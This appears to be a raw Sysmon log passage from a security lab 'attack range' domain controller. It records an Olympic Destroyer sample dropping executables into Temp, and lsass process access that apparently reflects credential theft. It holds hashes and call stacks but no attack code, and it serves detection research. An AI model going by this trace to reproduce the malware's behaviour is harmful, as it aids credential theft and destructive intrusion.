\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.480{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.480{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.480{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.480{C8EA50B7-12E6-6216-4B05-000000003802}67926764C:\Temp\olympic_destroyer.exe{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+4284|C:\Temp\olympic_destroyer.exe+79a3|C:\Temp\olympic_destroyer.exe+7a71|C:\Temp\olympic_destroyer.exe+b4a4|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.491{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe-----"C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=3C0D740347B0362331C882C2DEE96DBF,SHA256=AE9A4E244A9B3C77D489DEE8AEAF35A7C3BA31B210E76D81EF2E91790F052C85,IMPHASH=83139EB8E3828940B2E72C9D78987BE0{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000290113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.480{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000290112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:56:41.480{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exeC:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe2022-02-23 10:56:41.480 11241100x8000000000000000290111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:56:41.480{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exeC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2022-02-23 10:56:41.480 11241100x8000000000000000290110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:56:41.459{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exeC:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe2022-02-23 10:56:41.280 23542300x8000000000000000290109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.458{C8EA50B7-12E6-6216-4B05-000000003802}6792ATTACKRANGE\AdministratorC:\Temp\olympic_destroyer.exeC:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exeMD5=29E0BD724ECB8C0010325DE0B6F8D473,SHA256=B2CB5068A186B429DDCEF55A642E5597976EEBF9A9D3BFE33956F97D895C2EA9,IMPHASH=FD7200DCD5C0D9D4D277A26D951210AAtruetrue 11241100x8000000000000000290108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:56:41.280{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exeC:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe2022-02-23 10:56:41.280 23542300x8000000000000000290107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.280{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DECE12F1DF3703A541F1067BFF459F3,SHA256=37383AA81CF1D3E9B8F0F859E69AEC44F8C26963927628B84D1FDE4837E1DF59,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000290106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.261{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe 18141800x8000000000000000290105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:56:41.259{C8EA50B7-12E9-6216-4D05-000000003802}5692\BD323384-7437-4DCE-92B4-55D40F902E7AC:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe 10341000x8000000000000000290104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.242{C8EA50B7-12E9-6216-4D05-000000003802}56926904C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000000180012F3E) 10341000x8000000000000000290103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.227{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.227{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.227{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.227{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.227{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.227{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.227{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.227{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.227{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.211{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-4D05-000000003802}5692C:\Users\ADMINI~1\AppData\Local\Temp\qcksh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\nt